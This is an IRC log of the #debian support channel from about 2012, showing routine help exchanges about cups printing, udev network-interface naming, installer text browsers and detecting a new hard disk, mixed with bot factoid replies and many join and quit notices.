11:05 | -!- | zorro [~zorro@02d86316.bb.sky.com] has quit [] |
11:06 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
11:07 | -!- | hubutm20 [~hubutm20@79.114.112.223] has joined #debian |
11:07 | -!- | e-ndy [~jkastner@nat-pool-brq-t.redhat.com] has quit [Quit: Ex-Chat] |
11:07 | -!- | kevin8t8 [~kevin8t8@71-220-206-218.eugn.qwest.net] has joined #debian |
11:07 | -!- | XeL64[away] [XeL@40.129.84.77.rev.sfr.net] has quit [] |
11:07 | -!- | kevin8t81 [~kevin8t8@71-220-206-218.eugn.qwest.net] has quit [Read error: No route to host] |
11:07 | -!- | nicholi [~nicholi@rrcs-76-79-196-34.west.biz.rr.com] has joined #debian |
11:08 | -!- | debsan [~debsan@190.245.74.16] has joined #debian |
11:11 | -!- | gutoyr [~gutoyr@189.61.237.56] has joined #debian |
11:11 | -!- | tarik [~tarik@215.214-14-84.ripe.coltfrance.com] has joined #debian |
11:11 | -!- | blair [~blair@static-108-0-197-17.lsanca.fios.verizon.net] has quit [Quit: Ex-Chat] |
11:12 | -!- | SD [dalek@178.28.233.220.static.exetel.com.au] has joined #debian |
11:12 | <blast007> | polluX[W]: and -5C is probably on the low end of most components' operating range, unless you're going with some of the "rugged" or embedded platforms out there. |
11:12 | -!- | GTRsdk [~gtrsdk@66.242.82.247] has joined #debian |
11:12 | -!- | tarik [~tarik@215.214-14-84.ripe.coltfrance.com] has quit [] |
11:12 | -!- | tarik [~tarik@215.214-14-84.ripe.coltfrance.com] has joined #debian |
11:12 | <GTRsdk> | What is the package for the printer configuration? |
11:13 | -!- | Guest1889 [~knoppix@ool-457d86f5.dyn.optonline.net] has quit [Remote host closed the connection] |
11:13 | <Han> | cups |
11:13 | -!- | kriller_ [~kriller@nat.nordija.com] has quit [Ping timeout: 480 seconds] |
11:13 | -!- | bike [~bike@ti0128a380-dhcp0243.bb.online.no] has quit [Ping timeout: 480 seconds] |
11:13 | <amphi> | install cups and point your browser at localhost:631 |
11:14 | -!- | tarik [~tarik@215.214-14-84.ripe.coltfrance.com] has quit [] |
11:14 | -!- | SuperDale [dalek@178.28.233.220.static.exetel.com.au] has quit [Ping timeout: 480 seconds] |
11:14 | -!- | kowloonboy [~kowloonbo@82.132.139.251] has joined #debian |
11:14 | <GTRsdk> | amphi, Han: I mean the printer settings where it says "Printing" in the Gnome System Settings. Wasn't it like gnome-system-printing or something? |
11:14 | -!- | tarik [~tarik@215.214-14-84.ripe.coltfrance.com] has joined #debian |
11:15 | <amphi> | GTRsdk: I don't know about gnome |
11:15 | -!- | vrkalak [~vrkalak@66-87-4-3.pools.spcsdns.net] has joined #debian |
11:15 | -!- | tarik [~tarik@215.214-14-84.ripe.coltfrance.com] has quit [] |
11:16 | -!- | ant777 [~jay@unc-gw.aqa.com.ru] has joined #debian |
11:16 | -!- | eof [~eof@178.120.186.169] has quit [Remote host closed the connection] |
11:16 | -!- | ant777 [~jay@unc-gw.aqa.com.ru] has left #debian [] |
11:19 | -!- | and1bm [~andi@HSI-KBW-078-043-080-072.hsi4.kabel-badenwuerttemberg.de] has joined #debian |
11:19 | -!- | gutoyr [~gutoyr@189.61.237.56] has quit [Ping timeout: 480 seconds] |
11:20 | <Han> | Isn't that the notification thingiebob? |
11:20 | -!- | gudjon [~quassel@h47n2fls32o283.telia.com] has quit [Remote host closed the connection] |
11:21 | -!- | eof [~eof@178.120.25.20] has joined #debian |
11:21 | -!- | wintellect [~wintellec@cpc1-nmal8-0-0-cust5.croy.cable.virginmedia.com] has quit [Quit: leaving] |
11:22 | <GTRsdk> | maybe |
11:22 | -!- | kowloonboy [~kowloonbo@82.132.139.251] has quit [Quit: leaving] |
11:23 | -!- | bike [~bike@ti0128a380-dhcp0243.bb.online.no] has joined #debian |
11:23 | -!- | toto42 [~toto@p5081CCAA.dip.t-dialin.net] has joined #debian |
11:23 | -!- | xharx__ [~xharx@p4FFDA7B2.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
11:26 | <Guest1934> | does anyone knows how to install zend framework on debian? |
11:26 | <GTRsdk> | It looks like dpkg thinks I should do things the proper way too, so I'll just do it the proper way. |
11:28 | <sney> | Guest1934: I believe it is in one of the php5-* packages |
11:28 | -!- | zlynx [~Lynx@15.211.153.73] has joined #debian |
11:28 | <sney> | oh, but I'm wrong. |
11:28 | <sney> | !zend |
11:28 | <dpkg> | Zend Technologies is a software company focused on <PHP>. The Zend Engine is an open source scripting engine / virtual machine, Zend Engine 2 is included within PHP as of version 5.0. Zend Framework is a PHP-based web development framework, packaged for Debian as zendframework. |
11:28 | -!- | tolxief [~sid@pc-244-123-214-201.cm.vtr.net] has joined #debian |
11:30 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
11:30 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
11:33 | -!- | kriller_ [~kriller@2009ds2-gj.0.fullrate.dk] has joined #debian |
11:37 | -!- | webos [~webos@113.68.69.178] has joined #debian |
11:37 | -!- | Leon_Nardella [~Leon@187.10.248.139] has quit [Quit: Leaving] |
11:38 | <webos> | is there anybody install ubuntu on hp touchpad |
11:38 | -!- | freealan [~freealan@61-217-20-52.dynamic.hinet.net] has quit [Quit: leaving] |
11:39 | -!- | webos [~webos@113.68.69.178] has quit [] |
11:40 | -!- | kneet [~chrissear@home.chrissearle.org] has quit [Quit: WeeChat 0.3.2] |
11:40 | -!- | hobgoblinsmaster [~lminoza@62-193-63-36.stella-net.net] has quit [Quit: Bye] |
11:40 | -!- | toabctl [~tom@213.172.126.10] has quit [Quit: adios] |
11:42 | -!- | angasule [~angasule@user-0c8hj1j.cable.mindspring.com] has joined #debian |
11:42 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
11:42 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
11:42 | -!- | dirichlet [~ffurnari@apache.venere.it] has quit [Quit: leaving] |
11:44 | -!- | janos_ [~janos@93-87-213-144.dynamic.isp.telekom.rs] has quit [Ping timeout: 480 seconds] |
11:44 | -!- | janos_ [~janos@93-87-213-144.dynamic.isp.telekom.rs] has joined #debian |
11:47 | -!- | berto [~berto@espcolo-webproxy01.nokia.com] has quit [Quit: Bye] |
11:50 | -!- | mode/#debian [+l 499] by debhelper |
11:52 | -!- | el_erno [~el_erno@201.141.120.94] has joined #debian |
11:56 | -!- | ant777 [~jay@unc-gw.aqa.com.ru] has joined #debian |
11:56 | -!- | ant777 [~jay@unc-gw.aqa.com.ru] has left #debian [] |
11:57 | -!- | MTecknology [~Mike@mtecknology.user.oftc.net] has joined #debian |
11:57 | -!- | shanttu [~shanttu@dsl-hkibrasgw3-ffdec300-4.dhcp.inet.fi] has joined #debian |
11:58 | -!- | allam [~allam@93.95.201.190] has joined #debian |
11:58 | <MTecknology> | I used to have an eth0 and eth1 in this system, but those interfaces were replaced. How can I get back to having just an eth0 since there's only one nic in the system now? |
11:58 | -!- | allam [~allam@93.95.201.190] has quit [] |
11:59 | -!- | zk [~zk@79.112.2.122] has joined #debian |
11:59 | -!- | the-M [~the-M@TK212017102073.teleweb.at] has joined #debian |
11:59 | <daemonkeeper> | !70 |
11:59 | <dpkg> | udev has the ability to statically rename Ethernet cards based on MAC address. The addresses are configured in /etc/udev/rules.d/70-persistent-net.rules, edit this file to change the mappings. To apply changes: "udevadm trigger" or reload the relevant driver module. See also <forcedeth mac>, <udev>. |
11:59 | -!- | Guest1888 is now known as cusco |
12:01 | <gdb> | MTecknology: The simple answer is this (if you can afford a reboot): cd /etc/udev/rules.d ; rm *net* ; reboot |
12:01 | <gdb> | heh |
12:01 | <gdb> | That's what I do! |
12:01 | -!- | shanttu [~shanttu@dsl-hkibrasgw3-ffdec300-4.dhcp.inet.fi] has quit [Remote host closed the connection] |
12:01 | <daemonkeeper> | Or he just follows dpkg's advice. |
12:02 | <MTecknology> | both of those are extremely simple options :) |
12:02 | -!- | qerter_ [~qerter@140.127.220.67] has joined #debian |
12:02 | <daemonkeeper> | One slightly less insane. |
12:03 | <MTecknology> | HAH! _THAT_ was the only issue preventing me from virtualizing this system. |
12:03 | <MTecknology> | That's crazy. |
12:04 | -!- | qerter [~qerter@218-173-73-30.dynamic.hinet.net] has quit [Ping timeout: 480 seconds] |
12:04 | <MTecknology> | Apparently all the customized crap depends on eth0 being the interface with the right ip addy, the system can't just have it. |
12:05 | -!- | NIN [~NIN@p5DD28759.dip0.t-ipconnect.de] has joined #debian |
12:05 | -!- | marto [~marto@ip-75-188.interbild.net] has joined #debian |
12:05 | -!- | marto [~marto@ip-75-188.interbild.net] has left #debian [] |
12:05 | -!- | alyosha_sql is now known as alyosha |
12:06 | -!- | GTRsdk [~gtrsdk@66.242.82.247] has quit [Quit: git clone sleep] |
12:06 | <zk> | hello. can someone explain how to edit the xorg.conf file for good usage of an ati radeon 9550 card? here's my xorg.conf http://pastebin.com/k0NHAKAx |
12:06 | <zk> | using Ubuntu 10.04 |
12:06 | <retro|blah> | !ubuntu |
12:06 | <dpkg> | Ubuntu is based on Debian, but it is not Debian. Only Debian is supported on #debian. Use #ubuntu (irc.freenode.net) instead. Even if the channel happens to be less helpful, support for distributions other than Debian is offtopic on #debian. See also <based on debian>. |
12:08 | <zk> | ah...sorry :D my bad |
12:08 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
12:08 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
12:08 | -!- | shanttu [~shanttu@dsl-hkibrasgw3-ffdec300-4.dhcp.inet.fi] has joined #debian |
12:10 | -!- | konverguoju [~konverguo@91-233-176-160.inet.vub.lt] has joined #debian |
12:12 | -!- | user [~user@broadband-77-37-231-155.nationalcablenetworks.ru] has joined #debian |
12:13 | -!- | cyril [~cyril@eka-178-20-70-2.ftto.ovea.com] has quit [Remote host closed the connection] |
12:13 | -!- | user [~user@broadband-77-37-231-155.nationalcablenetworks.ru] has quit [] |
12:14 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
12:14 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
12:20 | -!- | cloud [~IRC@HSI-KBW-109-192-000-093.hsi6.kabel-badenwuerttemberg.de] has quit [Ping timeout: 480 seconds] |
12:20 | -!- | mafm [~quassel@hx-dnat-253.ebi.ac.uk] has quit [Remote host closed the connection] |
12:20 | -!- | alessandro [~alessandr@93-50-217-153.ip154.fastwebnet.it] has joined #debian |
12:20 | -!- | shanttu [~shanttu@dsl-hkibrasgw3-ffdec300-4.dhcp.inet.fi] has quit [Remote host closed the connection] |
12:20 | -!- | CutMeOwnThroat [~boo@p4FEA575B.dip.t-dialin.net] has joined #debian |
12:20 | -!- | Texou [~Texou@pda57-1-82-231-115-185.fbx.proxad.net] has joined #debian |
12:21 | -!- | bluenemo [~bluenemo@g226034152.adsl.alicedsl.de] has quit [Remote host closed the connection] |
12:23 | -!- | Se-bash [~seba@host180.200-82-88.telecom.net.ar] has joined #debian |
12:23 | -!- | ioannis [~ioannis@46.103.141.195] has joined #debian |
12:23 | -!- | ioannis [~ioannis@46.103.141.195] has left #debian [] |
12:23 | -!- | bluenemo [~bluenemo@g226034152.adsl.alicedsl.de] has joined #debian |
12:23 | -!- | semko [~semko@dhcp-186-46.gjk.dk] has joined #debian |
12:23 | <Guest1934> | does someone have experience with zend framework |
12:24 | <semko> | how does one bring up terminal during debian installation? |
12:24 | -!- | Greg [~Greg@194.154.202.122] has quit [Quit: Ex-Chat] |
12:24 | <semko> | 'cos i need to use lynx to logon to my internet |
12:24 | -!- | TheCrittaC [~critta@christopher-lemay-4.umeres.maine.edu] has quit [Read error: Connection reset by peer] |
12:25 | <txt_file> | semko: just press CRTL+ALT+F2 |
12:25 | <txt_file> | CTRL |
12:25 | <semko> | txt_file, thanks |
12:25 | -!- | Georg [~georg@dial-95-105-174-153-orange.orange.sk] has joined #debian |
12:25 | <semko> | but can i use lynx, that is the question :) |
12:25 | -!- | tolxief [~sid@pc-244-123-214-201.cm.vtr.net] has quit [Read error: Operation timed out] |
12:26 | <semko> | i'm pretty sure it is not in netinst cd |
12:26 | -!- | creepersam [~creepersa@h60.44.130.174.dynamic.ip.windstream.net] has joined #debian |
12:26 | -!- | Iridos [~boo@p4FEA58E2.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
12:26 | -!- | Georg [~georg@dial-95-105-174-153-orange.orange.sk] has quit [] |
12:26 | -!- | diverguoju [~konverguo@91-233-176-160.inet.vub.lt] has joined #debian |
12:27 | -!- | Georg [~georg@dial-95-105-174-153-orange.orange.sk] has joined #debian |
12:27 | -!- | wojtek [~example@109.231.12.48] has joined #debian |
12:27 | <creepersam> | #list |
12:27 | -!- | alessandro_ [~alessandr@93-50-217-153.ip154.fastwebnet.it] has joined #debian |
12:28 | -!- | konverguoju [~konverguo@91-233-176-160.inet.vub.lt] has quit [Read error: No route to host] |
12:28 | -!- | creepersam [~creepersa@h60.44.130.174.dynamic.ip.windstream.net] has quit [] |
12:28 | <txt_file> | semko: i don't thnik so but I don't know if it is on the bigger iso |
12:28 | <semko> | !lynx |
12:28 | <dpkg> | lynx is, like, a good i mean rocking web browser!, or the ultimate solution to banner ads, or to stop a transfer, hit Ctrl-G, or a piece of shit. <links> ownz it. See also <oldlynx>. |
12:29 | -!- | Georg [~georg@dial-95-105-174-153-orange.orange.sk] has quit [] |
12:29 | <semko> | txt_file, i guess i will try both of them :| |
12:29 | -!- | drewdavis [~devious@208.100.191.216] has quit [Remote host closed the connection] |
12:31 | -!- | alessandro_ [~alessandr@93-50-217-153.ip154.fastwebnet.it] has left #debian [] |
12:31 | -!- | mentor [~mentor@host81-136-253-116.in-addr.btopenworld.com] has quit [Remote host closed the connection] |
12:32 | -!- | alessandro [~alessandr@93-50-217-153.ip154.fastwebnet.it] has quit [Quit: Sto andando via] |
12:33 | -!- | gnugr [~vangelis@79.167.78.18] has quit [Quit: WeeChat 0.3.5] |
12:35 | -!- | shanttu [~shanttu@dsl-hkibrasgw3-ffdec300-4.dhcp.inet.fi] has joined #debian |
12:36 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
12:36 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
12:36 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
12:37 | -!- | diverguoju [~konverguo@91-233-176-160.inet.vub.lt] has quit [Ping timeout: 480 seconds] |
12:38 | -!- | qerter_ [~qerter@140.127.220.67] has quit [Ping timeout: 480 seconds] |
12:38 | -!- | bittin [~bittin@c213-100-108-76.cust.tele2.se] has joined #debian |
12:39 | -!- | arand [~mewerner_@c83-255-147-71.bredband.comhem.se] has quit [Ping timeout: 480 seconds] |
12:41 | -!- | NIN_ [~NIN@p5DD2894E.dip0.t-ipconnect.de] has joined #debian |
12:44 | -!- | Bizcrack [~biz@83.243.251.46] has joined #debian |
12:45 | -!- | Bizcrack [~biz@83.243.251.46] has left #debian [] |
12:46 | -!- | NIN [~NIN@p5DD28759.dip0.t-ipconnect.de] has quit [Ping timeout: 480 seconds] |
12:47 | -!- | wissem [~localhost@41.226.41.100] has joined #debian |
12:47 | -!- | Guest1934 [~fabio@227.6.166.178.rev.vodafone.pt] has quit [Remote host closed the connection] |
12:48 | -!- | swistak35 [~rlasocha@s21.linuxpl.com] has quit [Remote host closed the connection] |
12:50 | <melmothX> | i'm pretty sure w3m is installed by default |
12:50 | -!- | tazz [~gaurav@59.162.86.164] has quit [Read error: Operation timed out] |
12:51 | -!- | diverguoju [~konverguo@91-233-176-160.inet.vub.lt] has joined #debian |
12:51 | -!- | Gorgon [~oea@203080224109.static.ctinets.com] has joined #debian |
12:53 | -!- | amblin [~youwish@c-68-58-165-186.hsd1.sc.comcast.net] has joined #debian |
12:53 | -!- | swistak35 [~rlasocha@s21.linuxpl.com] has joined #debian |
12:54 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
12:54 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
12:54 | -!- | Se-bash^2 [~seba@host112.201-253-89.telecom.net.ar] has joined #debian |
12:55 | -!- | jmr [~Adium@border.exmeritus.com] has left #debian [] |
12:55 | -!- | tuxampol [~tuxampol@ppp-88-217-90-186.dynamic.mnet-online.de] has joined #debian |
12:56 | -!- | janus [~janus@WiFi-node-927.LaTech.edu] has joined #debian |
12:56 | -!- | Se-bash [~seba@host180.200-82-88.telecom.net.ar] has quit [Remote host closed the connection] |
12:56 | -!- | Se-bash^2 is now known as Se-bash |
12:56 | -!- | janus [~janus@WiFi-node-927.LaTech.edu] has quit [] |
12:56 | -!- | Gorgon [~oea@203080224109.static.ctinets.com] has quit [Read error: Operation timed out] |
12:57 | -!- | Gorgon [~oea@203080224109.static.ctinets.com] has joined #debian |
12:58 | -!- | mark76 [~quassel@cpc10-nfds14-2-0-cust293.8-2.cable.virginmedia.com] has quit [Read error: Connection reset by peer] |
13:00 | -!- | boredalot [~so@ppp046177084199.dsl.hol.gr] has joined #debian |
13:00 | -!- | kevin8t8_ [~kevin8t8@75-170-33-59.eugn.qwest.net] has joined #debian |
13:02 | -!- | mark76 [~quassel@cpc10-nfds14-2-0-cust293.8-2.cable.virginmedia.com] has joined #debian |
13:02 | <semko> | !w3m |
13:02 | <dpkg> | i guess w3m is an advanced text based web browser that supports mouse clicks, tabbed browsing, image rendering and SSL. w3m stands for "see the www" in japanese. When you pronounce w3m, it doesn't rhyme with "pteranodon". |
13:02 | -!- | semko [~semko@dhcp-186-46.gjk.dk] has quit [Quit: Leaving] |
13:03 | -!- | kriller__ [~kriller@nat.nordija.com] has joined #debian |
13:05 | -!- | clonak [~clonak@101.98.134.170] has quit [Ping timeout: 480 seconds] |
13:05 | -!- | Aleric [~carlo@aleric.user.oftc.net] has quit [Read error: Connection reset by peer] |
13:07 | -!- | kriller_ [~kriller@2009ds2-gj.0.fullrate.dk] has quit [Ping timeout: 480 seconds] |
13:07 | -!- | kevin8t8 [~kevin8t8@71-220-206-218.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
13:09 | -!- | degli [~degli@host144-126-dynamic.20-87-r.retail.telecomitalia.it] has joined #debian |
13:10 | -!- | swistak35 [~rlasocha@s21.linuxpl.com] has quit [Remote host closed the connection] |
13:10 | -!- | clonak_ [~clonak@101.98.134.170] has joined #debian |
13:11 | -!- | wilson [~wilson@77.119.155.141.wireless.dyn.drei.com] has joined #debian |
13:13 | -!- | Jose [~Jose@217.217.177.123.dyn.user.ono.com] has joined #debian |
13:13 | -!- | Jose [~Jose@217.217.177.123.dyn.user.ono.com] has quit [] |
13:13 | -!- | greenops [~greenops@c-06d7e555.033-32-6e6b7011.cust.bredbandsbolaget.se] has joined #debian |
13:13 | -!- | greenops [~greenops@c-06d7e555.033-32-6e6b7011.cust.bredbandsbolaget.se] has quit [] |
13:14 | -!- | lollercaust [~paper@85.Red-83-41-151.dynamicIP.rima-tde.net] has joined #debian |
13:15 | -!- | maxou56800 [~maxou5680@107.154.9.109.rev.sfr.net] has quit [Remote host closed the connection] |
13:17 | -!- | SBK|Al [~Al@194.Red-81-36-240.dynamicIP.rima-tde.net] has joined #debian |
13:17 | -!- | Se-bash^2 [~seba@host186.190-31-186.telecom.net.ar] has joined #debian |
13:17 | -!- | ribe [~riberto@64.134.28.70] has joined #debian |
13:19 | -!- | Se-bash [~seba@host112.201-253-89.telecom.net.ar] has quit [Ping timeout: 480 seconds] |
13:19 | -!- | Se-bash^2 is now known as Se-bash |
13:19 | -!- | baliano [~baliano@62.94.108.194] has joined #debian |
13:19 | -!- | linux [~linux@111.pool85-56-156.dynamic.orange.es] has joined #debian |
13:19 | -!- | a_landim_xhkl [~Andre@poseidon.cais.rnp.br] has quit [Remote host closed the connection] |
13:19 | -!- | linux is now known as Guest1948 |
13:20 | -!- | Guest1948 [~linux@111.pool85-56-156.dynamic.orange.es] has left #debian [] |
13:20 | -!- | SBK|Al [~Al@194.Red-81-36-240.dynamicIP.rima-tde.net] has left #debian [] |
13:20 | -!- | yani [~wircer@201.200.69.94] has joined #debian |
13:20 | -!- | yani is "Geanina" on #debian # |
13:21 | -!- | Aleric [~carlo@aleric.user.oftc.net] has joined #debian |
13:21 | -!- | marco [~marco@host71-32-dynamic.20-87-r.retail.telecomitalia.it] has joined #debian |
13:21 | -!- | Gorgon [~oea@203080224109.static.ctinets.com] has quit [Ping timeout: 480 seconds] |
13:22 | -!- | technologov [~technolog@bzq-79-181-163-198.red.bezeqint.net] has joined #debian |
13:22 | -!- | ribe [~riberto@64.134.28.70] has quit [] |
13:22 | -!- | marco_ [~marco@host71-32-dynamic.20-87-r.retail.telecomitalia.it] has joined #debian |
13:22 | <wilson> | niemand dada? |
13:22 | <wilson> | hallo marco ! |
13:23 | <daemonkeeper> | wilson: can we help you? |
13:23 | -!- | poinck [~poinck@p4FCDF13C.dip.t-dialin.net] has joined #debian |
13:23 | -!- | cevi [~cevi@boron.itp.tuwien.ac.at] has quit [Quit: Leaving] |
13:23 | -!- | soos [~soos@87.237.112.231] has joined #debian |
13:23 | <txt_file> | !de |
13:24 | <dpkg> | Deutschsprachige Hilfe bekommt ihr in #debian.de (auf irc.oftc.net, irc.freenode.net oder irc.belwue.de) - German speaking users please go to #debian.de (on irc.oftc.net, irc.freenode.net or irc.belwue.de). |
13:24 | <marco_> | !list |
13:24 | <dpkg> | marco_: È possibile di scaricare un sacco di software libero puntando il tuo browser a http://cdimage.debian.org/debian-cd/current/multi-arch/iso-cd/debian-6.0.4-amd64-i386-netinst.iso ! |
13:24 | <wilson> | yess - how to add a futher hdd to the system (Debian 6.0.4)? |
13:25 | <daemonkeeper> | plug it in, turn on your computer, wait. |
13:25 | <wilson> | NOO, just tried dowsnt work - bios setting approved - nothing |
13:25 | <marco_> | !lista |
13:25 | <marco_> | !list |
13:25 | <dpkg> | marco_: È possibile di scaricare un sacco di software libero puntando il tuo browser a http://cdimage.debian.org/debian-cd/current/multi-arch/iso-cd/debian-6.0.4-amd64-i386-netinst.iso ! |
13:27 | -!- | boredalot [~so@ppp046177084199.dsl.hol.gr] has left #debian [Αποχώρησε] |
13:27 | -!- | soos [~soos@87.237.112.231] has left #debian [] |
13:27 | -!- | kevin8t8 [~kevin8t8@71-220-200-130.eugn.qwest.net] has joined #debian |
13:27 | -!- | marco [~marco@host71-32-dynamic.20-87-r.retail.telecomitalia.it] has quit [Quit: Sto andando via] |
13:27 | -!- | marco_ [~marco@host71-32-dynamic.20-87-r.retail.telecomitalia.it] has quit [Quit: Sto andando via] |
13:27 | -!- | cr7 [~cr7@80.30.76.211] has joined #debian |
13:28 | <simonlnu> | wilson: you also have to partition it and make some filesystems on it |
13:28 | -!- | theworlds [~theworlds@static-72-72-162-100.hrbgpa.east.verizon.net] has joined #debian |
13:28 | -!- | PTKDev [~PTKDev@wireless-142-159.net.uniroma2.it] has quit [Remote host closed the connection] |
13:29 | -!- | weland [~weland_tb@83.166.214.174] has quit [Ping timeout: 480 seconds] |
13:29 | <wilson> | :-) nice joke - i think the hdd must be recognized first |
13:29 | <daemonkeeper> | What do you expect to happen? The disk is there. Make a file system on it, use it. |
13:29 | <cr7> | jajajjajajajj |
13:29 | -!- | vladuke [~vladuke@91.146.35.175] has joined #debian |
13:29 | -!- | a_landim_xhkl [~Andre@poseidon.cais.rnp.br] has joined #debian |
13:29 | <daemonkeeper> | Unless there is a file system aleady on it, there won't pop-up some desktop candy window |
13:30 | -!- | mode/#debian [+l 505] by debhelper |
13:30 | -!- | kevin8t8 [~kevin8t8@71-220-200-130.eugn.qwest.net] has quit [Remote host closed the connection] |
13:30 | <cr7> | hola me llamo DANI |
13:30 | <daemonkeeper> | do "fdisk -l" it will show you all attached disks. |
13:30 | -!- | reklipz [~nmschulte@ip72-198-206-85.om.om.cox.net] has quit [Quit: Leaving.] |
13:30 | <cr7> | jajjajajajaj |
13:30 | <themill> | !es-social cr7 |
13:30 | <dpkg> | cr7: Este canal es de ayuda con ordenadores en Ingles. Si no necesitas ayuda con tu ordenador por favor ingresa al canal social de #debian-es con /join #debian-es-cachondeo. Tus amigos probablemente ya esten ahi. |
13:30 | <wilson> | debian rcognizes each usb memory but NOT a connected hdd ?!?!? dont know whats wrong |
13:31 | -!- | baliano [~baliano@62.94.108.194] has quit [Remote host closed the connection] |
13:31 | <cr7> | u |
13:31 | <cr7> | san |
13:31 | -!- | mode/#debian [+q *!*@80.30.76.211] by ChanServ |
13:31 | <daemonkeeper> | Well, USB pen drives already come with a file system out of the box, typically vfat. |
13:31 | <Sicelo> | wilson: maybe your hdd is not connected right.. also take note of jumper settings .. they mean a lot on many machines |
13:32 | <daemonkeeper> | hard disks on the other hand typically won't. |
13:32 | <daemonkeeper> | Sicelo: Jumpers? haha :) |
13:32 | <Sicelo> | can someone take care of cr7? |
13:32 | <wilson> | sicelo ... what ? |
13:32 | <daemonkeeper> | themill already did. |
13:32 | -!- | kevin8t8 [~kevin8t8@71-220-200-130.eugn.qwest.net] has joined #debian |
13:32 | -!- | cr7 [~cr7@80.30.76.211] has quit [] |
13:33 | <wilson> | try the jumpers - thanx |
13:33 | <daemonkeeper> | Sicelo: No recent drive comes with jumpers anymore. Also, if it wold be a jumper thing, the drive wouldn't appear in the BIOS either. |
13:33 | <Sicelo> | ok |
13:34 | -!- | kevin8t8_ [~kevin8t8@75-170-33-59.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
13:35 | -!- | giuseppe [~giuseppe@adsl-ull-147-86.50-151.net24.it] has joined #debian |
13:35 | -!- | wilson [~wilson@77.119.155.141.wireless.dyn.drei.com] has quit [Remote host closed the connection] |
13:35 | <daemonkeeper> | Sicelo: FWIW, today virtually nobody uses IDE anymore thus there is no need to set any jumper. |
13:36 | -!- | scientes [~scientes@ppp-71-139-11-201.dsl.snfc21.pacbell.net] has joined #debian |
13:36 | -!- | edbian [~ed@th136-2.cs.wm.edu] has joined #debian |
13:36 | -!- | edbian [~ed@th136-2.cs.wm.edu] has quit [] |
13:38 | -!- | [dante] [~jesus@110.79.17.95.dynamic.jazztel.es] has joined #debian |
13:38 | -!- | [dante] [~jesus@110.79.17.95.dynamic.jazztel.es] has quit [] |
13:39 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has joined #debian |
13:40 | -!- | yani [~wircer@201.200.69.94] has left #debian [wIRC] |
13:41 | -!- | [machine] [~timb@paris1.fr.nth-dimension.org.uk] has quit [Ping timeout: 480 seconds] |
13:41 | -!- | vrkalak [~vrkalak@66-87-4-3.pools.spcsdns.net] has quit [Quit: Leaving] |
13:41 | -!- | joshuaspaulding [~josh@75-149-150-97-Minnesota.hfc.comcastbusiness.net] has joined #debian |
13:42 | <Sicelo> | hmm. true |
13:45 | -!- | kernel [~rlp@177.103.158.3] has joined #debian |
13:45 | -!- | kernel [~rlp@177.103.158.3] has quit [] |
13:45 | -!- | giuseppe [~giuseppe@adsl-ull-147-86.50-151.net24.it] has quit [Quit: Sto andando via] |
13:45 | -!- | DonManInBlack [~DonManInB@dslb-188-107-032-233.pools.arcor-ip.net] has joined #debian |
13:50 | -!- | [machine] [~timb@paris1.fr.nth-dimension.org.uk] has joined #debian |
13:50 | * | [machine] is gone. Gone since Sun Feb 5 02:47:00 2012 |
13:50 | <themill> | [machine]: please disable that |
13:51 | -!- | DonManInBlack [~DonManInB@dslb-188-107-032-233.pools.arcor-ip.net] has quit [Remote host closed the connection] |
13:51 | -!- | diverguoju [~konverguo@91-233-176-160.inet.vub.lt] has quit [Ping timeout: 480 seconds] |
13:52 | -!- | lollercaust [~paper@85.Red-83-41-151.dynamicIP.rima-tde.net] has quit [Quit: Leaving] |
13:52 | -!- | voorhees [~voorhees@spaceghost.nic.uoregon.edu] has joined #debian |
13:52 | -!- | journey [~d80cf664@webuser.thegrebs.com] has joined #debian |
13:53 | -!- | voorhees [~voorhees@spaceghost.nic.uoregon.edu] has quit [] |
13:53 | -!- | byonk [~byonk@114-42-90-94.dynamic.hinet.net] has quit [Remote host closed the connection] |
13:53 | -!- | achilleus_d [~achilleus@f053035254.adsl.alicedsl.de] has joined #debian |
13:53 | -!- | diverguoju [~konverguo@91-233-176-160.inet.vub.lt] has joined #debian |
13:54 | -!- | Jubar [~Jubar@62.87.237.130] has quit [Remote host closed the connection] |
13:54 | -!- | achilleus_d [~achilleus@f053035254.adsl.alicedsl.de] has left #debian [] |
13:54 | -!- | journey [~d80cf664@webuser.thegrebs.com] has quit [] |
13:56 | -!- | nviror [~nviror@182.68.58.235] has joined #debian |
13:57 | -!- | nviror [~nviror@182.68.58.235] has left #debian [] |
13:57 | -!- | nviror [~nviror@182.68.58.235] has joined #debian |
13:58 | -!- | nviror [~nviror@182.68.58.235] has left #debian [] |
14:00 | -!- | mode/#debian [+l 498] by debhelper |
14:00 | -!- | aroundthfur [~aroundthf@host-124-93.panorama.sth.ac.at] has joined #debian |
14:00 | -!- | themill [~stuart@themill.user.oftc.net] has quit [Ping timeout: 480 seconds] |
14:01 | -!- | phdeswer [~phdeswer@HSI-KBW-46-223-253-0.hsi.kabel-badenwuerttemberg.de] has joined #debian |
14:01 | -!- | stummi [~Stummi@77-64-128-168.dynamic.primacom.net] has joined #debian |
14:03 | -!- | sitinavra [~sitinavra@188.4.162.209.dsl.dyn.forthnet.gr] has joined #debian |
14:03 | -!- | jlsookiki [~jlsookiki@pal01cs004.americas.hp.net] has joined #debian |
